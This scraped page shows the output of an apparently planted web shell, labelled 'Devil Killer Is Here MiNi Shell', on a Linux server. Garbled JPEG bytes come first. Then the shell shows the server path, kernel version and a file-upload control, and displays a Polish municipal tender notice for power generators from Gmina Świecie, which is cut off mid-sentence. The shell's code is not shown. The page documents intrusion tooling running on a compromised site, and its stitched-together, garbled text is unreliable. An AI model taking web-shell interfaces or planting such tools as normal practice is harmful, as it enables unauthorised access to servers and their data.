JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20251023/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20251023/0049329401-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „Dostawa agregatów prądotwórczych oraz masztu oświetleniowego z agregatem – II postępowanie” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Świecie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 092351067</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wojska Polskiego 124</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Świecie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">86-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL618 - Świecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">523332323</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@swiecie.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.swiecie.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Dostawa agregatów prądotwórczych oraz masztu oświetleniowego z agregatem – II postępowanie” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5ab4b5a7-83e5-4f2b-9609-a5633cb39a6d</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00493294</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-10-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00009968/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.6 Dostawa agregatów prądotwórczych oraz masztu oświetleniowego z agregatem</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/swiecie <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/swiecie</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający, zgodnie z § 11 ust. 3 rozporządzenia Prezesa Rady Ministrów z dnia <br/>30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej <br/>w postępowaniu o udzielenie zamówienia publicznego lub konkursie, określa niezbędne wymagania sprzętowo-aplikacyjne umożliwiające na Platformie, tj.:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b) komputer klasy PC lub Mac o następującej konfiguracji: pamięć RAM min. 2 GB, procesor Intel IV 2 GHz lub jego nowsza wersja, jeden z systemów operacyjnych – MS Windows 7, Mac OS X 10.4, Linux lub ich nowsze wersje,<br/>c) zainstalowana dowolna, inna przeglądarka internetowa niż Internet Explorer,<br/>d) włączona obsługa JavaScript,<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f) szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.,<br/>g) oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>Wykonawca może zwrócić się do Zamawiającego z pisemną prośbą o wyjaśnienie treści SWZ za pośrednictwem Platformy i formularza „Wyślij wiadomość do Zamawiającego” dostępnego na stronie dotyczącej danego postępowania.Zamawiający będzie przekazywał Wykonawcom informacje w formie elektronicznej za pośrednictwem Platformy.Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości bezpośrednio na Platformie przesłanych przez Zamawiającego, gdyż system powiadomień może ulec awarii lub powiadomienie może trafić do folderu SPAM.Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z instrukcją korzystania z Platformy, w szczególności za sytuację, gdy Zamawiający zapozna się z treścią oferty przed upływem terminu składania ofert (np. złożenie oferty w zakładce „Wyślij wiadomość do Zamawiającego”).<br/>Taka oferta zostanie uznana przez Zamawiającego za ofertę handlową i nie będzie brana pod uwagę w przedmiotowym postępowaniu, ponieważ nie został spełniony obowiązek narzucony w art. 221 ustawy Pzp.<br/>Wszelką korespondencję związaną z niniejszym postępowaniem należy przekazywać za pośrednictwem: platformazakupowa.pl. Korespondencję uważa się za przekazaną w terminie, jeżeli dotrze do Zamawiającego przed upływem wymaganego terminu. Każda ze Stron na żądanie drugiej niezwłocznie potwierdzi fakt otrzymania wiadomości elektronicznej.<br/>Instrukcja korzystania z Platformy Zakupowej przez Wykonawców jest dostępna pod adresem: https://platformazakupowa.pl/strona/45-instrukcje<br/>Poniżej osoby wskazane do porozumiewania się z Wykonawcami, przy czym komunikacja ustna dopuszczalna jest w odniesieniu do informacji, które nie są istotne, w szczególności nie dotyczą ogłoszenia o zamówieniu lub dokumentów zamówienia, potwierdzenia zainteresowania lub ofert:w zakresie dotyczącym przedmiotu zamówienia: Marcin Kulewski e-mail: kulewski@swiecie.eu, tel. 52 33 32 342,<br/>w zakresie dotyczącym zagadnień proceduralnych: Kamila Mrozinska e-mail: mrozinska@swiecie.eu, tel. 52 33 32 342.<br/>We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem postępowania określonym przez Zamawiającego na pierwszej stronie SWZ, tj.: OR.271.29.2025.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://platformazakupowa.pl/pn/swiecie</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 <br/>z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych), zwanego dalej „rozporządzeniem RODO”, informujemy, że:<br/>1.	Administratorem Pani/Pana danych osobowych jest Burmistrz Świecia mający siedzibę przy ul. Wojska Polskiego 124, 86-100 Świecie, tel. 52 33 32 323, e-mail: sekretariat@swiecie.eu;<br/>2.	Administrator wyznaczył Inspektora Ochrony Danych Pana Bogdana Głowacza, z którym można się kontaktować tel. 601 992 970, e-mail: partnersystem.iod@gmail.com;<br/>3.	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c rozporządzenia RODO, w celu związanym z przedmiotowym postępowaniem o udzielenie niniejszego zamówienia publicznego, prowadzonym w trybie podstawowym bez możliwości negocjacji, nr postępowania: OR.271.29.2025;<br/>4.	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Pzp;<br/>5.	Pani/Pana dane osobowe będą przechowywane zgodnie z art. 78 ust. 1 ustawy Pzp przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy <br/>w sposób gwarantujący jego nienaruszalność;<br/>6.	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisanych ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego;<br/>7.	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 rozporządzenia RODO;<br/>8.	posiada Pani/Pan:<br/>a)	na podstawie art. 15 rozporządzenia RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku gdy skorzystanie z tego prawa wymagałoby po stronie Administratora niewspółmiernie dużego wysiłku, może zostać Pani/Pan zobowiązana/-ny do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia),<br/>b)	na podstawie art. 16 rozporządzenia RODO prawo do sprostowania lub uzupełnienia Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników),<br/>c)	na podstawie art. 18 rozporządzenia RODO prawo żądania od Administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, <br/>o których mowa w art. 18 ust. 2 rozporządzenia RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego),<br/>d)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy rozporządzenia RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">nie przysługuje Pani/Panu:<br/>a)	w związku z art. 17 ust. 3 lit. b, d lub e rozporządzenia RODO prawo do usunięcia danych osobowych,<br/>b)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 rozporządzenia RODO,<br/>c)	na podstawie art. 21 rozporządzenia RODO prawo sprzeciwu wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c rozporządzenia RODO;<br/>przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne <br/>z rozporządzeniem RODO przetwarzanie Pani/Pana danych osobowych przez Administratora, organem właściwym dla przedmiotowej skargi jest Prezes Urzędu Ochrony Danych Osobowych, ul. Moniuszki 1A, 00-014 Warszawa.<br/><br/>1.Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o których mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą<br/>2.W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o których mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OR.271.29.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> DOTYCZY CZĘŚCI I:<br/>Dostawa i rozruch agregatu prądotwórczego do 120 kW na przyczepie<br/>Przedmiot zamówienia stanowi dostawa i rozruch agregatu prądotwórczego na przyczepie z silnikiem diesla o mocy znamionowej – od 95 kW do 120 kW (nie mniej niż 95 kW). <br/><br/>Wyposażenie standardowe:<br/>	Obudowa z trwałego i odpornego na warunki zewnętrzne materiału, zabezpieczona przed opadami atmosferycznymi, konstrukcja sztywna i wyciszona<br/>	Rama agregatu pokryta powłoką antykorozyjną<br/>	Przemysłowy silnik wysokoprężny, ON – DIESEL - chłodzony cieczą<br/>	Grzałka bloku silnika (podgrzewanie obiegu płynu chłodniczego)<br/>	Zasilacz buforowy służący do doładowania akumulatora <br/>	Układ wspomagania rozruchu w niskich temperaturach<br/>	Podstawowe oświetlenie wnętrza w technologii LED<br/>	Zabezpieczenie antywibracyjne silnika i prądownicy<br/>	Grzałka układu sterowania w szafie elektrycznej<br/>	Elektroniczny panel sterowania w języku polskim<br/>	Zabezpieczenie agregatu z tablica kontrolną parametrów elektrycznych oraz silnika<br/>	Schemat elektryczny<br/>	Wyposażony w akumulator i okablowanie<br/>	Wskaźnik poziomu naładowania akumulatorów<br/>	Kompletna instalacji paliwowa, smarowania, chłodzenia i elektryczno-rozruchowa<br/>	Tablica rozdzielcza z osprzętem pomiarowym i zabezpieczeniami pracy agregatu<br/>	Możliwość ręcznego uruchomienia bez obciążenia, ręcznego obciążenia oraz wyłączenia<br/>	Wlew zbiornika osłonięty i zabezpieczony na kluczyk<br/>	Moc znamionowa od 95 kW do 120 kW ( nie mniej niż 95 kW) <br/>	Napięcie znamionowe	400/230 V <br/>	Częstotliwość 50Hz <br/>	Klasa izolacji uzwojeń: H <br/>	Stopień ochrony: IP23<br/>	Czas pracy na pełnym zbiorniku przy 100% obciążenia ok 7h <br/>	Akumulator przystosowany do pracy od - 20C do + 40C<br/>	Akumulator odporny na drgania wywołane pracującym silnikiem wysokoprężnym<br/>	Gniazda odbioru mocy z zabezpieczeniami, wyprowadzone na zewnątrz obudowy (klasa IP67):<br/>•	125 A 400V IP 67 – 1 szt.<br/>•	63 A 400V IP 67 – 1 szt.<br/>•	32 A 400V IP 67 – 1 szt.<br/>•	16 A 230V – 2 szt<br/>	Podwozie dwuosiowe z dyszlem regulowanym wyposażonym w dwa wymienne zaczepy – jeden umożliwiający podłączenie do ROCKINGER  40 (końcówka z oczkiem), drugi kulowy<br/>	4 podpory stabilizujące<br/>	Instalacja elektryczna i oświetleniowa, która musi być wykonana zgodnie z obowiązującymi przepisami ruchu drogowego umożliwiająca holowanie przez samochody do 3,5 ton zapewniającą pełną kompatybilność z instalacją oświetlenia przyczepy w tych typach pojazdów<br/>	Instalacja przyczepy 12/24 V	<br/>	Koło podporowe<br/>	Kliny pod koła<br/>	Przyłącze elektryczne zakończone złączem elektrycznym 7-mio pinowym<br/>	Dodatkowy przewód połączeniowy o długości zapewniającej prawidłowe podłączenie instalacji elektrycznej przyczepy z pojazdem <br/>	Konstrukcja podwozia odporna na działanie warunków atmosferycznych.<br/><br/>Cena powinna obejmować również koszt transportu, uruchomienia oraz szkolenia z obsługi.<br/>Każdy przedmiot zamówienia:<br/>– musi być nowy, w pełni sprawny i gotowy do użycia zgodnie z jego przeznaczeniem,<br/>– musi odpowiadać obowiązującym standardom jakościowym i technicznym,<br/>– musi być wolny od jakichkolwiek wad fizycznych i prawnych,<br/>– musi być zgodny z ofertą Wykonawcy,<br/>– nie może być obciążony żadnymi prawami na rzecz osób trzecich,<br/>Ogłoszenie nr 2025/BZP 00454107/01 z dnia 2025-10-02<br/>2025-10-02 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>– musi pochodzić z oficjalnych kanałów dystrybucyjnych producenta, zapewniających<br/>w szczególności realizację uprawnień gwarancyjnych,<br/>– będzie dostarczony przez Wykonawcę na adres wskazany przez Zamawiającego,<br/>– nie może być przeznaczony przez producenta do wycofania z produkcji lub sprzedaży<br/>w dniu sporządzenia oferty.<br/>Wykonawca zobowiązuje się do wykonania przedmiotu zamówienia zgodnie z zasadami współczesnej wiedzy,<br/>obowiązującymi przepisami, normami oraz na ustalonych w umowie warunkach.<br/>Zamawiający nie zastrzega możliwości ubiegania się o udzielenie zamówienia wyłącznie przez Wykonawców, o których<br/>mowa w art. 94 ustawy Pzp.<br/>Szczegółowy opis przedmiotów zamówienia znajduje się w załączniku nr 2 do SWZ (dotyczącego CZĘŚCI I, CZĘŚCI II I<br/>CZĘŚCI III), – szczegółowy opis wymaganych parametrów technicznych.<br/>Zadanie finansowanie będzie w całości z dotacji celowej z Programu Ochrony Ludności i Obrony Cywilnej na lata<br/>2025/2026.<br/>W przypadku określenia w dokumentacji zamówienia, w szczególności stanowiącej załącznik nr 2 do niniejszej SWZ<br/>(dotyczący CZĘSCI I, CZĘSCI II, CZĘŚCI III), przedmiotu zamówienia przez wskazanie technologii, producenta, nazw<br/>własnych, znaków towarowych lub pochodzenia urządzeń i materiałów, odniesienie do norm, europejskich ocen<br/>technicznych, aprobat, specyfikacji technicznych<br/>i systemów referencji technicznych, Zamawiający informuje, że mają one jedynie charakter pomocniczy dla określenia<br/>podstawowych parametrów i cech zastosowanych materiałów. Zamawiający dopuszcza zastosowanie rozwiązań<br/>równoważnych z zachowaniem tych samych standardów technicznych, technologicznych, jakościowych i funkcjonalnych.<br/>Przez produkty równoważne należy rozumieć urządzenia i materiały posiadające nie gorsze parametry techniczne i te same<br/>cechy funkcjonalne co wskazany konkretny z nazwy czy pochodzenia produkt. Zastosowanie produktów równoważnych w<br/>żaden sposób nie może wpłynąć na prawidłowe funkcjonowanie rozwiązań technicznych. Wykaz zastosowanych i przyjętych<br/>przez Wykonawcę do wyceny materiałów lub urządzeń rozwiązań równoważnych musi zostać załączony do oferty, jeżeli<br/>taka sytuacja będzie miała miejsce. Zgodnie z art. 101 ust. 5 i 6 ustawy Pzp Wykonawca, który powołuje się na rozwiązania<br/>równoważne zobowiązany jest wykazać, że oferowane przez niego dostawy, usługi lub roboty budowlane spełniają<br/>wymagania określone przez Zamawiającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">31122000-7 - Jednostki prądotwórcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-18</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/>Lp.	Opis kryterium oceny	Znaczenie (%)<br/>1.	Cena	60%<br/>2.	Okres gwarancji	40%<br/>	Razem	100%<br/><br/>Oferta otrzyma zaokrągloną do dwóch miejsc po przecinku ilość punktów.<br/>a)	kryterium nr 1 – cena (maksymalnie 60 pkt)<br/>Punkty za kryterium „cena” (1 pkt – 1%) zostaną obliczone w następujący sposób:<br/><br/>najniższa cena oferowana wśród wszystkich<br/>podlegających ocenie ofert<br/>Najniższa cena brutto = --------------------------------------------------------------------------- x 60 pkt<br/>cena zaoferowana w badanej ofercie<br/><br/>b)	kryterium nr 2 – okres gwarancji (maksymalnie 40 pkt)<br/>W kryterium „okres gwarancji” ocena zostanie dokonana w oparciu o informacje podane <br/>w formularzu ofertowym (załącznik nr 1 do SWZ). Okres gwarancji na przedmiot zamówienia musi być podany liczbowo w pełnych latach (tzn. bez możliwości zaoferowania okresu wynoszącego np. 2,5 roku) i nie może być krótszy niż 2 lata:<br/>•	w przypadku gdy Wykonawca zaoferuje okres gwarancji krótszy niż 2 lata lub zaoferuje okres gwarancji w niepełnych latach lub w przypadku gdy Wykonawca nie wskaże okresu gwarancji, oferta Wykonawcy podlegać będzie odrzuceniu na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp,<br/>•	w przypadku wskazania podstawowego 2-letniego okresu gwarancji Wykonawca otrzyma liczbę punktów w zakresie kryterium nr 2 – 0 pkt,<br/>•	w przypadku wskazania 3-letniego okresu gwarancji Wykonawca otrzyma liczbę punktów w zakresie kryterium nr 2 – 20 pkt,<br/>•	w przypadku wskazania 4-letniego okresu gwarancji Wykonawca 